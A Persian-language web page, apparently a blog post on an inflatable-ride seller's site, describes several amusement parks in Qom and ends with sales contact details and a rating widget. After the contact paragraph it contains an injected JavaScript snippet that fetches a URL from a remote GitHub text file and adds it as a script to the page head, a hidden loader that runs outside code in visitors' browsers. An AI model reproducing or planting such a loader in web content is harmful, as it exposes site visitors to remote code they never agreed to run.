برترین شهربازی های قم
برترین شهربازی های قم

برترین شهربازی های قم

  • بشیتر مردم فکر می کنن که قم جای برای تفریح ندارد ولی بر عکس قم مکان های زیادی برای تفریح دارد. سه تا از برترین شهربازی های قم

    رنگین کمان

    شهربازی سرپوشیده رنگین کمان، تنها یکی از چندین جاذبه گردشگري تفریحی موجود در استان قم است.

    برترین شهربازی های قم

    این مجتمع توریستی تفریحی دارای بخش های مختلفی نظیر شهربازی سرپوشیده، رستوران و کافی شاپ است که در طول این سال ها مورد اقبال مردم شهر قم و گردشگران قرار گرفته است. شهربازی رنگین کمان اولین شهربازی سرپوشیده ی شهر قم است و محلی مناسب برای بازی و تفریح برای تمامی گروه های سنی است. در این شهربازی، بازی ها و بخش های متنوعی قرار دارد.

    فضای شهربازی با رنگ های شاد، کودکانه و با شخصیت های محبوب انیمیشنی طراحی شده است . انواع دستگاه های بازی، ماشین برقی، اتاق بازی برای کودکان و خردسالان، استخر توپ، بسکتبال رقابتی، انواع چرخ و فلک، قطار بازی، ایر هاکی، بازی های متنوع کامپیوتری و بولینگ از جمله بازی ها و تفریحات این شهربازی است.

    برترین شهربازی های قم

    از بخش های دیگر مجموعه تفریحی رنگین کمان، سینمای 4 بعدی، قصر بادی و پیست کارتینگ است.

    برترین شهربازی های قم


    شهر بازی و بوستان غدیر یکی برترین شهربازی های قم

    این بوستان یکی از مکان های توریستی و تفریحی دارای بخش های مختلفی نظیر شهربازی سرپوشیده و سر باز، رستوران و کافی شاپ که مورد اقبال قمی ها و گردشگران قرار گفته. و همچینین این بوستان شمال یک زمین فوتبال و یک زمین والیبال می باشد.

    برترین شهربازی های قم
    برترین شهربازی های قم

    از جمله بخش های فعلی این بوستان عبارت اند از : پارک بزرگ آب و تاب و باغ رستوران آب و تاب، دهکده جنگلی کاج که شامل رستوران و پیست کارتینگ است، کافی شاپ، فضای سبز و پوشش گیاهی پارک جنگلی

    برترین شهربازی های قم

    برترین شهربازی های قم

    از ویژگی‌های بارز این پروژه می‌توان به بزرگ‌ترین شهربازی در استان قم در مقیاس مساحت و تعداد دستگاه‌ها اشاره کرد. استفاده از دستگاه‌های سبک و سنگین به روز در مجموعه از جمله دستگاه «ترن یو» به‌عنوان بزرگ‌ترین دستگاه ترن یو در مقیاس ملی است.

    برترین شهربازی های قم

    در این شهربازی، تمام دستگاه‌ها توسط گروه صنعتی بیات در محل سایت ساخته، رنگ‌آمیزی و مونتاژ شده‌اند. ایجاد فضای سبز با گونه‌های آب شیرین در داخل مجموعه به همراه پارکینگ اختصاصی از دیگر ویژگی‌های بارز این پروژه است.

    برترین شهربازی های قم

    این شامل دستگاهی: چرخ فلک، سرسره بادی، فریزبی، ترن یو، ماشین برقی، کشتی صبا، سرسره ابشار، تاب گردان و … است.

    برترین شهربازی های قم

    کاربری‌های پروژه کهشان در بلور غدیر را موردتوجه قرارداد و افزود: این مجموعه با همکاری بخش خصوصی و با کاربری‌هایی ازجمله سینما، رستوران و شهربازی احداث‌شده و به مجموعه تفریحی بوستان غدیر اضافه‌شده است.

    برترین شهربازی های قم
    برترین شهربازی های قم
    برترین شهربازی های قم

    بوستان و شهر بازی علوی

    پارك علوی قم ، یكی از پارك های پرطرفدار شهر قم می باشد . این پارك یكی از پارك های قدیمی و معروف استان قم است كه در بلوار غدیر و جنوب غربی شهر قم قرار دارد و همواره مورد استقبال مردم استان قم بوده است و یكی از محبوب‌ترین مکان ها برای تفریح و خوشگذرانی به حساب می‌آید. این بوستان وسیع و سر سبز یكی از محل های كمپینگ مهم در شهر قم است و امكانات لازم برای مسافران در آن ایجاد شده است.

    برترین شهربازی های قم

    پیست اسكیت ، پیست دوچرخه سواری ، مسیر پیاده روی ، زمین های ورزشی ، وسایل بازی كودكان ، رستوران ، گلخانه ، كمپینگ مسافرین و… از بخش های بوستان علوی هستند و همچنین وجود مسجد، آلاچیق برای برپایی پیك‌نیك، زمیت اسکیت، تجهیزات ورزشی، بوفه هم بخش دیگری از امكاناتی می باشدكه برای تفریح و خوشگذرانی شما در بوستان علوی قرار دارند.
    همچنین شهربازی علوی و مجموعه تفریحی سورتمه كوهستان و تله سیژ در این بوستان قرار دارند كه شما در صورت علاقه مندی می توانید از این تفریحات استفاده كنید و لذت ببرید.

    شهربازی 72 تن

    شروع کار شهربازی 72 تن بزودی ………

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۴ از ۵
    از مجموع ۸ رای

    دیدگاهتان را بنویسید